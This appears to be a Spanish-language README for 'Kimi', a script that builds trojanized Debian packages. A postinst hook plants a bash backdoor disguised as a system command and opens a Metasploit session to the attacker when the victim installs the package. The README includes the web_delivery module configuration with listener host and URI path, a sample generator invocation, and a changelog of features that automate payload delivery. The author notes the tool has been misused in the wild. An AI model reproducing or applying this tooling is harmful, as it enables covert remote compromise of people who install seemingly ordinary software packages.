
Script para generar paquetes debian maliciosos (troyanos debain).
Script para generar paquetes debian maliciosos (troyanos debain).
Kimi es un nombre inspirado en "Kimimaro", uno de mis personajes favoritos del anime llamado "Naruto".
Kimi es un script que genera un paquete debian malicioso para metasploit
que consiste en un archivo bash. El archivo bash se despliega en el directorio "/usr/local/bin/".
La puerta trasera se ejecuta justo cuando la víctima intenta instalar el paquete deb debido al archivo postinst
El archivo bash se inyecta y también actúa como algún comando del sistema que, cuando es ejecutado por la víctima,
y el atacante obtiene una sesión.
Puntos positivos :
-- Totalmente independiente. Significa que el usuario no necesita instalar ningún creador de paquetes debian
-- Puede integrarse fácilmente con cualquier generador de payload debido a los argumentos (simple :P lo sé)
Kimi básicamente depende del módulo web_delivery y todo está automatizado.
todo lo que el atacante necesita es realizar las siguientes configuraciones :
Configuración de Web_Delivery en msf :
msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit
Generando payload malicioso :
dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0 -a i386
NOTA :: Este proyecto fue creado para ser integrado con Venom Shellcode Generator 1.0.13.
También se puede usar de forma independiente, todo lo que el usuario necesita es cambiar uripath en las variables de msf
-------------------------------------------------------------------------------------
Probado en :
Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
ParrotOS (Debian Jessie)
Kali Rolling 2.0
[Feb-22-2017]
-- Se añadió función de creación de archivo "postinst" para automatizar la ejecución del archivo malicioso incrustado
-- Se añadió función de generación de archivo RC para automatizar completamente con la apertura del handler, lo que significa que no es necesario
configurar el handler manualmente
-- Se corrigieron algunos errores comunes [agradecimientos especiales a r00t 3xp10it :)]
[Oct-12-2017]
-- Se añadió argumento de línea de comandos (-a/--arch) para seleccionar arquitectura (i386/amd64)
[April-24-2019] - Versión de prueba.
-- Ahora se puede configurar URI y LPORT personalizados
-- El payload de Python se ha actualizado según Python 2/3 y también la última versión de Metasploit 5.
-- Todo el código se reimplementó aunque todavía soporta Python 2.7

Blog Post : http://hackinguyz.blogspot.in/2017/03/kimi-malicious-debian-package-creator.html
YouTube Video : https://youtu.be/Dsn6BRHy9_w
Muestra de VirusTotal (Porque vi un uso desagradable de este script en la naturaleza): 7d91abb413c8cd3274f348ff12f244b9a503abfe018f138d34bbe2deab04472f
Suspicious Shell Activity [Red Team]
Twitter : @bofheaded